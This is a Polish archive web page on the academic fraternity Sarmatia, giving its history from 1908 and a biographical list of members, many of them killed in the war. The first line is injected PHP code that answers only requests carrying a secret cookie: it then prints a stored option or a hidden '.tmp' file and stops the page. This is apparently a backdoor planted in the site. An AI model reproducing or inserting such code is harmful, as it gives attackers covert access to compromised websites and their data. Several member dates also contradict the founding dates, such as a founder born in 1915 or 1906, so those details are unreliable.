if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Sarmatia

Dekiel Janusza Tymowskiego Nazwa:
Polska Korporacja Akademicka Sarmatia
Siedziba:
Petersburg, od 1915 r. Warszawa
Data powstania:
8 V 1908 r.
Barwy:
brązowa – srebrna – seledynowa (barwy petersburskie: amarant - biel - zieleń)
Dewiza:
„Honor i dobro Narodu i Państwa najwyższym prawem każdego obywatela. Gospodarzami w Polsce - Polacy” (dewiza petersburska: „Młodzieży bądź szałem rozumna”)

Rys historyczny

Banda z krzyżem sarmackim Janusza Tymowskiego

Sarmatia powstała w 1908 r. w Petersburgu z połączenia tajnych polskich związków „Lechitia” i „Klubu Nietoperza”. Inicjatorem powstania korporacji był Olgierd Malinowski. Nazwa nawiązuje do antycznego ludu Sarmatów, którzy zamieszkiwali stepy wschodniej Europy, docierali na tereny Polski, a w publicystyce, literaturze i historiografii polskiej XV - XVIII wieku uchodzili za przodków Polaków. Członkami korporacji byli co do zasady studenci prawa Uniwersytetu Petersburskiego. Przeważająca większość z nich podchodziła z terenów Infant oraz innych ziem wschodnich dawnej Rzeczypospolitej. Korporacja miała charakter niepodległościowy i patriotyczny. Z tradycji filomackich i romantycznych wywodziło się hasło petersburskiej Sarmatii “Młodzieży bądź szałem rozumna.”, zaś z tradycji powstańczych - melodia hymnu, będąca melodią “Pieśni Strzelców” z czasów Powstania Styczniowego. Barwami korporacji były kolory narodowe - amarant i czerwień oraz symbolizująca nadzieję na odzyskanie niepodległości - zieleń. Po wybuchu pierwszej wojny światowej działalność petersburskiej Sarmatii stopniowo zamierała.

Herb Sarmatii, 1938 r.

W 1915 r. z inicjatywy petersbuskiego Sarmaty Edmund Janowskiego Sarmatia rozpoczęła działalność w Warszawie. Została afiliowana przy nowo utworzonej Politechnice Warszawskiej. Zdecydowano o zmianie barw czapek korporacji przyjmując zamiast amarantowego kolor czapek studentów Politechniki Warszawskiej - brązowy. W 1918 r. doszło do oficjalnego połączenia Sarmatii petersburskiej i warszawskiej.

Sarmatia była jedną z najbardziej prężnych korporacji okresu międzywojnia. W odróżnieniu od większości innych tzw. starych korporacji (utworzonych przed I wojną światową) miała wyraźny profil narodowy. Uzewnętrzniło się to m.in. w nowej dewizie korporacji: „Honor i dobro Narodu i Państwa najwyższym prawem każdego obywatela. Gospodarzami w Polsce - Polacy”. Obok czynnej korporacji działał Związek Filistrów oraz Koło Pań.

Zaproszenie na Bal XXX-lecia Sarmatii, 1938 r.

Sarmatia była wraz z Arkonią i Welecją jednym z inicjatorów zorganizowania zjazdu polskich korporacji akademickich, na którym w kwietniu 1921 r. wraz z pięcioma innymi korporacjami powołała Związek Polskich Korporacji Akademickich (data starszeństwa związkowego: 8 V 1908 r.). Obradom przewodniczył Sarmata Henryk Pankiewicz, który został następnie wybrany pierwszym Prezesem Związku. W późniejszych latach prezesami Związku byli także Jerzy Karol Czerwiński (1927-28) oraz Leonard Rudowski (1930 r.).

Ślub z ceremoniałem korporacyjnym Bronisławy Rudowskiej i Tadeusza Blautha, Bogurzyn 1938 r.

Przy Sarmatii kandydowały: K! Aquilonia w 1921 r., K! Coronia w 1922 r., K! Filomatia Varsoviensis w 1925 r., K! Ostoja w 1926 r. oraz K! Vigintia w 1927 r. Sarmata Walery Starczewski po przeniesieniu na studia na Politechnice Gdańskiej założył tam K! Helania.

Sarmatia zawarła 15 stycznia 1922 r. kartel wieczysty z poznańską K! Lechia.

Całkowita ustalona, praktycznie kompletna imienna lista członków za okres 1908-1939 obejmuje 227 (226?) nazwisk.

Spotkanie Sarmatów u Stefana Skalskiego, Warszawa 30 VI 1974 r.

W okresie wojny odbywały się spotkania Sarmatów początkowo we Francji, później w Wielkiej Brytanii. Wydano wówczas kilka numerów komunikatów sarmackich. W okresie powojennym Sarmatia działała nieoficjalnie zarówno w kraju w Warszawie oraz na emigracji w Londynie organizując komerse i spotkania okolicznościowe. W Polsce spotkania te stały się częstsze i liczniejsze po odwilży 1956 r. Głównym animatorem tej aktywności byli nieoficjalni prezesi Sarmatii Stefan Skalski, a po jego śmierci Janusz Tymowski i Bogusław Dobrzański. Z kolei w Wielkiej Brytanii w 1978 r. ukonstytuowało się Koło Filistrów K! Sarmatia na Obczyźnie, któremu przewodzili Janusz Popiel a następnie Leonard Jastrzębski.

Winieta londyńskich Komunikatów Sarmatii, 1986 r.

Efektem tych starań były wydawane w latach 1978-1992 w Londynie Komunikaty Koła Filistrów K! Sarmatia na Obczyźnie. W 1988 r. z okazji 80-tej rocznicy powstania korporacji ukazała się w kraju, pod redakcją Bogusława Dobrzańskiego, Stanisława Lewickiego, Józefa Rudowskiego oraz Olgierda Staniszkisa, księga pamiątkowa. W 1978 r. odsłonięto w kościele p.w. św. Anny w Warszawie oraz w 1983 r. w kościele p.w. św. Andrzeja Boboli w Londynie tablice pamiątkowe poświęcone poległym oraz pomordowanym Sarmatom. W 1978 r. przyjęty został do korporacji jako członek honorowy - jedyny w latach 1939-1989 młody Sarmata - ks. prałat dr Tadeusz Uszyński. Od lat 70-tych tak w Polsce, jak i w Wielkiej Brytanii bliskie były kontakty Sarmatii z kartelową K! Lechia.

Z inicjatywy oraz wysiłkiem czterech warszawskich korporacji: Sarmatii, Patrii, Aquilonii i Sparty oraz poznańskiej Lechii w latach 1983-1988 w baszcie przy kościele akademickim pw. św. Anny powstała korporacyjna Kwatera Pamięci. W niej w 1986 r. oraz w 1987 r. ufundowane zostały kolejne sarmackie tablice: pierwsza imienna ofiarowana 53 poległym i pomordowanym w latach 1920-1945 Sarmatom oraz druga poświęcona dwóm powojennym prezesom Koła Filistrów w Londynie i Warszawie – Januszowi Popielowi oraz Januszowi Tymowskiemu. W 1992 r. Sarmatia została reaktywowana (www.sarmatia.pl).

Lista członków

Poniższa, praktycznie kompletna lista członków Sarmatii obejmuje ponad dwieście nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Stanisław Baliński, student UW, c. 1919, żołnierz wojny polsko-bolszewickiej, prawnik
 2. Edmund Baszkowski, (25 lipca 1903 w Kaliszu - 1940 w Katyniu) s. Mariana i Cecylii z Jankowskich, student i absolwent prawa UW, c. 1923, akt. 1923-30, wiceprezes sem. zim. 1926/27, wiceprokurator Sądu Okręgowego w Warszawie, aresztowany przez NKWD w Dubnie, zamordowany przez NKWD
 3. Stanisław Jaxa-Bąkowski, (1915 - 23 czerwca 1960) student PW, założyciel Sarmacji w Warszawie 1915, akt. 1915-28, kawalerzysta, uczestnik wojny polsko-bolszewickiej, inżynier
 4. Wojciech Jaxa-Bąkowski, ( - 1943 w Lublinie) założyciel Sarmacji w Warszawie 1915, akt. 1915-28, kawalerzysta, żołnierz wojny polsko-bolszewickiej, prezes Naczelnego Komitetu Akademickiego Związku Narodowego Polskiej Młodzieży Akademickiej 1920, inż. PW, aresztowany przez Gestapo i rozstrzelany w Lublinie
 5. Jerzy Bełkowski, (22 stycznia 1904 - 25 grudnia 1986 w Londynie) student PW, c. 1924, akt. 1924-32, prezes sem. zim. 1928/29, inż. lotnik, w wojnie obronnej 1939, żołnierz artylerii przeciwlotniczej, po wojnie na emigracji w Hiszpanii i Wielkiej Brytanii, profesor silników lotniczych w Stambule
 6. Stanisław Bieńkowski, (1915 - 1944?) student UW, c. 1933, akt. 1933-36, sekretarz sem. let. 1935/36, mgr praw, żołnierz AK, walczył w AK w Powstaniu Warszawskim na Starym Mieście, wywieziony po upadku powstania warszawskiego w głąb Niemiec na przymusowe roboty, gdzie zginął
 7. Tadeusz Józef Biliński, (25 lutego 1905 w Widłach w Rosji - 1940 w Charkowie) s. Ludwika i Leontyny z Turzyńskich-Kochanowiczów, absolwent Gimnazum w Lublinie 1924, student i absolwent 1928 prawa UW, akt. 1925, prokurator, ppor. rez. art. 3 Pułku Artylerii Lekkiej, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD
 8. Jerzy Binzer, (22 luty 1912 - 9 grudnia 1988) student SGGW, c. 1933, inż. rolnik, żołnierz AK “Uprawa”

  Tadeusz Blauth, 1938 r.

 9. Tadeusz Blauth, (26 czerwca 1912 w Berlinie - 31 stycznia 1985 w Warszawie) syn Tadeusza i Marii z Fangorów, uczeń Gimnazjum im. Jana Zamoyskiego 1920-30, absolwent Gimnazjum im. im Mikołaja Reja 1931, student PW, c. 1931, akt. 1931-32, inż. mechanik, przeszkolenie wojskowe w Szkole Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim i w 3 Dywizjonie Artylerii Przeciwlotniczej w Warszawie 1933-34, w wojnie obronnej 1939 w 1 Pułku Artylerii Przeciwlotniczej w obronie Warszawy, podczas okupacji produkował broń dla AK, jeniec oflagów Nieenburg, Spittal oraz IIC w Woldenbergu 1939-40, zwolniony, w konspiracji przy produkcji pistoletu maszynowego “Błyskawica” dla ZWZ-AK, w Powstaniu Warszawskim dowódca plut. AK na Woli, Starym Mieście i Żoliborzu, ranny, w 1946 w ramach UNRRA w Paryżu i Liegu zajmując się dostawami urządzeń dla odbudowywanego przemysłu krajowego, po powrocie przez wiele miesięcy więziony pod fałszywym zarzutem szpiegostwa, w latach 1949-59 w szeregu przedsiębiorstw w dziedzinie mechanizacji budownictwa, w latach 1959-78 w ZZG Inco, aktywny działacz społeczny, m.in. w NOT, Automobilklub, PZMot, ZBOWiD, PTTK, Legia, odznaczony m.in. Srebrnym Krzyżem Virtuti Militari i Krzyżem Walecznych, Krzyżem Partyzanckim, awansowany do stopnia kapitana. Vide szerzej na stronie Rodziny Rudowskich.

 10. Stanisław Bobrowski, ( - po 1945) c. 1922, akt. 1922-29, inż. rolnik
 11. Piotr Bomas, z Kurlandii lub z Inflant, student Uniwersytetu w Petersburgu, założyciel Sarmacji w Petersburgu 1908, prawnik
 12. Jerzy Dunin-Borkowski, student PW, c. 1929, akt. 1929-30, inżynier
 13. Adam Roman Brzeziński, (19 grudnia 1912 we Lwowie - 1940 w Katyniu) s. Romana i Marii z Lipnickich, absolwent Gimnazjum im. Stefana Batorego w Warszawie 1931, student i absolwent leśnictwa SGGW, c. 1931, akt. 1931-32, ppor. rez. 30 Pułku Piechoty, w wojnie obronnej 1939 w 30 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD
 14. Witold Bukowiecki, ( - 1946) student UP (?), członek Lechii, następnie student UW, c. 1931 Sarmatia, akt. 1931-32, prawnik, adwokat
 15. Edmund Bułhak, (1913 - 17 wrzesień 1939 w Duszkowie k. Olechnowicz) student SGGW, c. 1931, akt. 1931-32, inż. rolnik, zamordowany przez Armię Czerwoną w Duszkowie po jej wkroczeniu w granice RP
 16. Stanisław Byczewski, (15 lipca 1909 - 12 grudnia 1988) student UW i UP, c. 1928, akt. 1928-31, mgr praw, w wojnie obronnej 1939 w piechocie, w czasie okupacji w kontrwywiadzie AK, po wojnie adwokat

  Zygmunt Jaxa-Bykowski, lata 30-te (?).

 17. Zygmunt Jaxa-Bykowski, (1901 - 19 września 1978) student WSH, c. 1924, akt. 1924-30, wiceprezes sem. zim. 1927/28

 18. Tadeusz Chajęcki, (1912-1940) student chemii PW, c. 1932, akt. 1932, zmarł tragicznie podczas okupacji niemieckiej
 19. Aleksander Chrzanowski, student PW, c. 1919, inż. dróg i mostów, żołnierz wojny polsko-bolszewickiej 1920

  Stefan Chrząszczewski, 1921 r.

 20. Stefan Chrząszczewski, ( - 1944 w Warszawie) student PW, założyciel Sarmacji w Warszawie 1915, akt. 1915-30, uczestnik wojny polsko-bolszewickiej 1920, żołnierz AK, aresztowany przez Gestapo, zamordowany w więzieniu w Alei Szucha

 21. Władysław Cimkowicz, z Wileńszczyzny, student Uniwersytetu w Petersburgu, założyciel Sarmacji w Petersburgu 1908, prawnik, adwokat
 22. Stanisław Cybulski, ( - 1939-44 w Radomiu) student PW, c. 1923, inż. architekt, żołnierz AK, zamordowany przez Gestapo w więzieniu
 23. Bohdan Cywiński, (1912 - czerwiec 1981) student WSH, c. 1929/30, akt. 1929-30, ekonomista, w wojnie obronnej 1939 w piechocie, po wojnie na emigracji w Australii
 24. Andrzej Czaplicki, (1908 - 1945 w Gross-Rosen) student WSH, c. 1927, akt. 1927-30, wiceolderman sem. zim. 1927/28, bankowiec, więzień obozów koncentracyjnych w Auschwitz i Gross-Rosen, zamordowany w obozie
 25. Andrzej Czarnecki, (1905 - 11 sierpnia 1960) student WSH, c. 1924, akt. 1924-28, sekretarz sem. zim. 1924/25, handlowiec, żołnierz w wojnie obronnej 1939, więzień oflagu w Murnau

  Jerzy Czerwiński, 1928 r.Jerzy Czerwiński, 1931 r. (?).

 26. Jerzy Czerwiński, (1904 - 12 czerwca 1941 w Palmirach) student UW, c. 1924, prezes sem. zim. i sem. let. 1925/26, prezes Warszawskiego Koła Międzykorporacyjnego 1925/26; referent prasowy ZPKA 1925 (IV kadencja), prezes ZPKA 1927-28 (VI kadencja) oraz 1928 (VII kadencja), Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA, mgr praw, adwokat, wiceprezes Związku Filistrów Sarmacji 1931, aresztowany 12 czerwca 1941 wraz z żoną rozstrzelani przez Gestapo

 27. Jerzy Czyżewicz, (1912 - 2 stycznia 1985) student PW, c. 1931/32, akt. 1931/32, inż. chemik, w wojnie obronnej 1939 w Dywizjonie Artylerii Konnej, więzień obozu koncentracyjnego w Buchenwaldzie, docent doktor
 28. Andrzej Czyżewski, student PW, c. 1919, żołnierz wojny polsko-bolszewickiej 1939, inżynier
 29. Kazimierz Dąbrowski, (15 marca 1898 w Briańsku w Rosji - 1944? w Dachau ?) s. Henryka (być może Welecja) i Zofii Karoliny z d. Mackiewicz, student PW, założyciel Sarmacji w Warszawie 1915 (?), kawalerzysta w wojnie polsko-bolszewickiej 1920 w stopniu podchorążego 27 Pułku Ułanów im. Króla Stefana Batorego, odznaczony Krzyżem Virtuti Militarii, inż., w latach 20-tych został zarzadcą maj. Wierzbinek na Kujawach należącego do Stefana Chrząszczewskiego (Sarmacja), gdzie mieszkał przynajmniej do jesieni 1942, zmuszony do opuszczenia majątku następnie zarządzał majątkiem w Osmólsku w gminie Sanniki w powiecie gostynieckim, aresztowany przez Gestapo 13 kwietnia 1944, więziony w Kutnie, a następnie osadzony w obozie koncentracyjnym w Gross-Rosen, po wojnie uznany sądownie za zmarłego w Dachau

  [Źródła (poza podanymi poniżej spisu członków): relacja Aleksandra Kopińskiego]

 30. Władysław Kazimierz Doria-Dernałowicz, (13 maja 1890 - 1971 w Poznaniiu) s. Stefana i Zofii z Kamieńskich, prawd. brat stryjeczny Jerzego (Corona), herbu Lubicz, student UW, c. 1918, por. kawalerii (?), dyplomata
 31. Konrad Didier, ( - przed 1939) student PW, c. 1920, inżynier
 32. Bogusław Dobrzyński, (4 września 1913 - 3 maja 1995 w Warszawa) absolwent Gimnazjum im. A. Mickiewicza, student PW, c. 1934, akt. 1934-38, prezes sem. zim. 1937/38, mgr inż. chemik, w wojnie obronnej 1939 w Wojskowym Nadzorze Technicznym, w Powstaniu Warszawskim w 8 Dywizji Piechoty AK na Żoliborzu, po wojnie wieloletni dyrektor Zakładów Materiałów Lampowych, laureat nagrody państwowej, prezes Związku Filistrów 1986-1995, zastępca członka Zarządu Stowarzyszenia Filistrów Polskich Korporacji Akademickich 1993-95, pochowany na Cmentarzu na Bródnie

  Jan Dramiński.

 33. Jan Barnaba Dramiński, (16 stycznia 1907 w Dźwierznie w pow. płockim - 15 sierpnia 1970 w Warszawie) herbu Przyjaciel, s. Władysława i Józefy z Targowskich, absolwent Gimnazjum im. Króla W. Jagiełły w Płocku, student i absolwent 1934 rolnictwa SGGW, c. 1928, akt. 1928-32, po studiach gospodarował we własnych majątkach, ppor. rez., w wojnie obronnej 1939 dowódca plutonu ckm w Szwadronie Krakusów (kawalerii dywizyjnej) wystawionym przez 8 Pułk Strzelców Konnych Pomorskiej Brygady Kawalerii dla 4. Dywizji Piechoty w ramach Armii “Pomorze”, uczestnik bitwy nad Bzurą, po urwaniu łączności z dywizją w dyspozycji Zbiorowego Pułku Pomorskiej Brygady Kawalerii, w czasie odwrotu w kierunku Warszawy ranny, w rejonie Sochaczewa wzięty do niewoli, uciekł ze szpitala jenieckiego, na przełomie 1939/40 osadzony w więzieniu w Płocku, po zwolnieniu przedostałl się do Generalnej i Guberni i prowadził gospodarstwo rolne w okolicach Żerania, po wojnie pracował w Centralnym Zarządzie Przemysłu Młynarskiego oraz w Zakładzie Doświadczalnym Instytutu Fizjologii i Żywienia Zwierząt PAN w Jabłonnej

 34. Stanisław Drozdowicz, (1901 - 15 października 1944 w Gross-Lubars) student WSH, c. 1923, akt. 1923-26, olderman sem. zim. 1925/26, przemysłowiec, por. rez., w wojnie obronnej 1939 w 7 Pułku Ułanów, w Powstaniu Warszawskim jako oficer AK 8 Dywizji Piechoty AK na Żoliborzu, ciężko ranny, odznaczony Krzyżem Walecznych, wywieziony do szpitala w obozie koncentracyjnym Gross-Lubars, gdzie zmarł
 35. Tadeusz Dubowski, student UW, c. 1925/26 (?), akt. 1925/26-31, prawnik
 36. Michał Dudrewicz, ( - 1953) student SGGW, c. 1927, akt. 1927-32, olderman sem. zim. 1928/29, inż. rolnik, kawalerzysta w wojnie polsko-bolszewickiej 1920
 37. Kazimierz Starża Dzierzbicki, (16 października 1918 - wrzesień 1998 w Kanadzie) student SGGW, c. 1937, rolnik, żołnierz partyzantki AK i 2 Korpusu PSZ we Włoszech, po wojnie na emigracji w Kanadzie
 38. Lucjan Dziewanowski, (1918 - 1944 w Warszawie) student PW, c. 1937, w Powstaniu Warszawskim żołnierz AK, poległ w Śródmieściu
 39. Sławomir Dziewanowski, (1913 - 2 sierpnia 1944 pod Babicami) student PW, c. 1931, akt. 1932-39, ostatni prezes sem. let. 1938/39, inż. mech., oficer AK, w Powstaniu Warszawskim dowódca 237 plutonu Batalionu “Żubr”, poległ pod Babicami
 40. Julian Felsz, (27 stycznia 1916 - 24 listopada 1997 w Warszawie) absolwent Gimnazjum im. Zamoyskiego, student SGH, c. 1933, handlowiec, w wojnie obronnej 1939 w 28 Dywizji Artylerii Ciężkiej

  Stanisław Fijalski, 1931/32 r.

 41. Stanisław Fijalski, student UW, student WSH (1929), akt. 1928-32, sekretarz sem. zim. 1930/31, olderman sem. let. 1930/31, olderman sem. let. 1931/32, prezes sem. let. 1931/32, wiceprezes zewnętrzny ZPKA 1931-32 (XI kadencja)

 42. Stanisław Froelich, (8 stycznia 1904 - 3 grudnia 1943 w Warszawie) student UW, c. 1923, akt. 1923-25, olderman sem. zim. 1924/25, prezes sem. let. 1924/25, wiceprezes zewnętrzny ZPKA 1925 (IV kadencja), wiceprezes wewnętrzny ZPKA 1925-27 (V kadencja), rozstrzelany w egzekucji, mgr praw, w wojnie obronnej oficer rez. 8 Pułku Ułanów, w czasie okupacji w AK “Uprawa”, aresztowany przez Gestapo, rozstrzelany w egzekucji ulicznej
 43. Stanisław Garbaczewski, (1907-1977) student SGGW, c. 1926, akt. 1926-31, inż. rolnik
 44. Jerzy Gauze, (1909 - 1944 w Warszawie) student WSH, c. 1936, ekonomista, poległ w Powstaniu Warszawskim
 45. Bronisław Gąsiorowski, ( - 1920) student prawa UW, c. 1919, kawalerzysta w wojnie polsko-bolszewickiej 1920, w czasie której poległ
 46. Stanisław Geyer, (1901 - 1 sierpnia 1944 w Warszawie) student UW, c. 1918, kawalerzysta w wojnie polsko-bolszewickiej 1920, ekonomista, olderman (1931) i wieloletni prezes Związku Filistrów Sarmacji, wieloletni prezes Związku Filistrów Sarmacji, żołnierz AK w Powstaniu Warszawskim, poległ w Śródmieściu
 47. Andrzej Gliński, ( - 14 maj 1926 w Warszawie) student rolnictwa SGGW, c. 1920, akt. 1920-26, poległ w obronie praworządności w czasie zamachu stanu, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA
 48. Stanisław Głowacki, ( - przed 1939) student PW, c. 1918, akt. 1918-25, żołnierz wojny polsko-bolszewickiej 1920, inżynier

  Jerzy Goliszewski, 1974 r.

 49. Jerzy Goliszewski, (2 czerwca 1897 - 28 grudnia 1982) student PW, c. 1918, inżynier dróg i mostów, kawalerzysta w wojnie polsko-bolszewickiej 1920 i wojnie obronnej 1939, więzień oflagu w Woldenbergu i obozu koncentracyjnego w Stutthofie, po wojnie wykładowca PG

 50. Leszek Gruszecki, (7 sierpnia 1910 - 29 marca 1982) student UP, a następnie student UW, początkowo w Lechii, c. 1932 Sarmatia, akt. 1932, mgr praw, prokurator, żołnierz Brygady Karpackiej (Tobruk, Monte Cassino, Piedimonte), po wojnie na emigracji w Wielkiej Brytanii
 51. Tadeusz Grzybowski, (15 stycznia 1902 - 26 grudnia 1971) student PW, c. 1918, inż. chemik, żołnierz wojny polsko-bolszewickiej 1920, wojny obronnej 1939 oraz PSZ na Zachodzie
 52. Bolesław Halik, ( - po 1970) student PW, c. 1918, inżynier, kawalerzysta w wojnie obronnej 1920
 53. Ernest Helmersen, (20 marca 1898 - 10 grudnia 1940) s. Wiktora i Anny hr. Pujatin, student SGGW, c. 1923, inż. rolnik, aresztowany przez Gestapo, więzień obozu koncentracyjnego w Dachau, zamordowany w obozie [Źródło (poza wskazanymi poniżej spisu członków): Archiwum (baza danych osobowych) Kurlandzko-Inflanckie]
 54. Edmund Hempowicz, (3 luty 1914 - listopad 1992) brat Wiktora (Lechia), student PW, c. 1933, inż. mechanik
 55. Henryk Hilchen, (1881 - 1956 w Słupsku) z Kurlandii lub z Inflant, absolwent Wydziału Chemii Politechniki Lwowskiej 1905, studiował prawo i teologię we Fryburgu i Petersburgu, członek Sarmacji we Fryburgu i Petersburgu c. 1908, ksiądz katolicki, dr teologii, prałat
 56. Henryk Jacuński, ( - po 1970) student SGGW, c. 1924, akt. 1924-32, inż. leśnik, kawalerzysta w wojnie polsko-bolszewickiej 1920, odznaczony Krzyżem Virtuti Militari, artylerzysta w wojnie obronnej 1939, odznaczony Krzyżem Virtuti Militari, żołnierz AK w Lubelskim i w Częstochowie
 57. Ryszard Jahołkowski, (1905 - 1944 w Warszawie) student PW, c. 1924, akt. 1924-32, inżynier, w Powstaniu Warszawskim żołnierz AK, poległ na Ochocie
 58. Andrzej Jacek Jankowski, (11 grudnia 1907 - 21 czerwca 1940 w Palmirach) student SGGW, c. 1927, akt. 1927-31, sekretarz sem. zim. 1928/29, inż. rolnik, aresztowany i stracony z ojcem w Palmirach
 59. Stanisław Jankowski, (29 września 1911 w Warszawie - 5 marca 2002 w Warszawie) student UW, student PW (1930), c. 1929, akt. 1929-32, olderman sem. let. 1931/32, mgr inż. architekt 1938, asystent PW 1938-39, w wojnie obronnej 1939 w Ośrodku Artylerii Lekkiej w Wilnie, uciekł z niewoli sowieckiej i przedostał do Francji, w PSZ na Zachodzie, cichociemny od 1942 w kraju, żołnierz wywiadu AK, kierownik Wydziału Legalizacji i Techniki w Oddziale II Komedy Głównej ps. “Burek”, “Kucharski”, od 1944 “Agaton”, w Powstaniu Warszawskim m.in. dowódca plutonu “Agaton” w Batalionie “Pięść” oraz w oddziale osłonowym Komendy Głównej, po Powstaniu w niewoli adiutant gen. Tadeusza Bora-Komorowskiego, w 1946 wrócił do kraju, pracował przy odbudowie i rozwoju Warszawy w Pracowni Urbanistycznej Warszawy (później Biuro Planowania Rozwoju Warszawy), współautor m.in. Trasy W-Z, MDM, kolejnych opracowań Planu Perspektywistycznego Rozwoju Warszawy i Warszawskiego Zespołu Miejskiego, prowadził prace urbanistyczne w Iraku, Macedonii i Peru, odznaczony m.in. Krzyżem Virtuti Militari i dwukrotnie Krzyżem Walecznych, Krzyżem AK, Krzyżem Kawalerskim OOP, honorowy obywatel Warszawy 1995, autor wspomnień “”Z fałszywym ausweisem w prawdziwej Warszawie” (Warszawa 1980), pochowany na Cmentarzu Ewangelicko-Augsburskim w Warszawie
 60. Edmund Janowski, (1906 - przed 1944 w Auschwitz) z Bartodziejów w Radomskim, student Uniwersytetu w Petersburgu, założyciel Sarmacji w Petersburgu 1908, inicjator stworzenia Sarmacji w Warszawie, prawnik, kpr. pchor., ps. AK “Rybitwa”, zamordowany w obozie koncentracyjnym w Auschwitz

  Jerzy Jarociński, 1938 r.

 61. Jerzy Jarociński, (1916 - 31 sierpnia 2001 w Legnicy) student SGGW i UP, c. 1936, akt. 1936-39, sekretarz sem. zim. 1938/39, mgr inż. rolnik, mistrz gorzelnicy, wykładowa oraz autor książek na tematy gorzelnictwa, ratownik górski, pochowany w Legnicy

 62. Stefan Jaroszewski, (1893-1942) student UP (?) i PW, założyciel Sarmacji w Warszawie 1915, inż. dróg i mostów, żołnierz wojny polsko-bolszewickiej 1920
 63. Bolesław Jaruzelski, (1910-1993/4) brat Władysława (Sarmatia), student UW, c. 1930, akt. 1930-32, prawnik, adwokat, w wojnie obronnej 1939 w 1 Pułku Szwoleżerów, w Powstaniu Warszawskim żołnierz AK na Mokotowie
 64. Władysław Jaruzelski, (19 czerwca 1906 - 1991) brat Bolesława (Sarmatia), student SGGW, c. 1927, akt. 1927-31, inż. rolnik, w wojnie obronnej 1939 w 1 Pułku Szwoleżerów, odznaczony Krzyżem Virtuti Militari, w czasie okupacji w AK “Uprawa”
 65. Leonard Jastrzębski, (15 maja 1912 - 17 lutego 2005 w Londynie) student PW, c. 1932, akt. 1932-39, prezes sem. zim. 1938/39, inż. mechanik, w konspiracji kierownik komórki legalizacyjnej KG ZWZ, w Powstaniu Warszawskim dowódca ps. “Krzysztof” jednego z plutonów pułku “Baszta”, ranny, odznaczony Krzyżem Walecznych, po wojnie na emigracji w Londynie, jeden z inicjatorów powołania Koła Sarmacji na Obczyźnie, od 1986 drugi prezes i wydawca “Komunikatów” Koła Filistrów Sarmacji na Obczyźnie
 66. Wiktor Jastrzębski, (9 czerwca 1915 - 1 sierpnia 1944 w Warszawie) student PW, c. 1934, mechanik, więzień obozu koncentracyjnego w Oranienburgu, w Powstaniu Warszawskim w 7 Pułku Piechoty Legionów “Garłuch”, zginął w ataku na Okęciu

  Tadeusz Kajkowski, ok. 1926 r.

 67. Tadeusz Romuald Kajkowski, (6 stycznia 1907 w Czarkowie - 3 maja 1990) z rodziny inteligenckiej, absolwent klasycznego Gimnazjum w Wągrowcu, student AMW, c. ok. 1926 Lutyko-Venedya, następnie w poznańskiej Lechii, student i absolwent 1933 PID, akt. 1930-32 Sarmatia, po studiach prowadził gabinet stomatologiczny przy ul. Św. Marcin w Poznaniu, w czasie okupacji pracownik magistratu w Chodzieży, a po wojnie Urzędu Wojewódzkiego w Poznaniu, od 1950 dyrektor Wojewódzkiej Poradni Stomatologicznej w Poznaniu, dr stomatologii AM w Poznaniu 1951, później prowadził prywatną praktykę stomatologiczną przy ul. Św. Marcin 38, jeden z organizatorów powojennych spotkań Lechitów, pochowany w grobowcu rodzinnym na Cmentarzu przy ul. Lutyckiej w Poznaniu

  Janusz Kalinowski, 1938 r.

 68. Janusz Kalinowski, (1918 - sierpień 1994) student SGH, c. 1936, ekonomista, w Powstaniu Warszawskim w 8 Dywizji Piechoty AK na Żoliborzu

 69. Michał Kamiński, (?), ( - 19 czerwca 1989), członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 70. Stanisław Kasperkiewicz, ( - 9 luty 1961) student PW, c. 1922, akt. 1922-29, inż. rolnik
 71. Leon Kaszewski, (1904 - 27 listopada 1973) student SGGW, c. 1924, akt. 1924-28, inż. rolnik
 72. Roman Józef Kizler, (14 listopada 1907 - 19 lutego 1996) brat Stanisława (Sarmatia), student PW, c. 1928, akt. 1928-32, I wiceprezes sem. zim. 1929/30, prezes sem. zim. 1930/31, mgr inż. elektryk, wojnie obronnej 1939 w łączności, żołnierz AK
 73. Stanisław Kizler, (20 sierpnia 1913 w Warszawie - 2 marca 1986 w Katowicach) brat Romana Józefa (Sarmatia), student UW, c. 1931, akt. 1931-32, mgr praw, w wojnie obronnej w 1 Pułku Szwoleżerów, odznaczony Krzyżem Virtuti Militari, żołnierz AK w Lubelskim
 74. Leonard Knoch, (23 listopada 1912 - 11 listopada 1995 w Gdańsku) student PW, c. 1930, akt. 1930-32, sekretarz sem. let. 1931/32, inż. elektryk, w Powstaniu Warszawskim w obsłudze radiostacji na Mokotowie, doktor nauk technicznych, prof. nadzw. PG

  Jerzy Knorr, ok. 1939 r.

 75. Jerzy Antoni Knorr, (3 lutego 1920 w Warszawie - 17 listopada 1939 w Warszawie) s. Jana i Marii z Olendzkich, student Wydziału Inżynierii Lądowej PW, c. 1939, pchor. rez., ranny 21 września w obronie obronnej 1939 w obronie Warszawy, zmarł w skutek ciężkich obrażeń, pochowany na warszawskich Powązkach

 76. Henryk Kolberg-Kołobrzeg, ( - 1943 w Auschwitz) student PW, założyciel Sarmacji w Warszawie 1915, inżynier, żołnierz wojny polsko-bolszewickiej 1920, w czasie okupacji osadzony w obozie koncentracyjnym w Auschwitz, tam zamordowany

  Stanisław Konarski, lata 30-te.

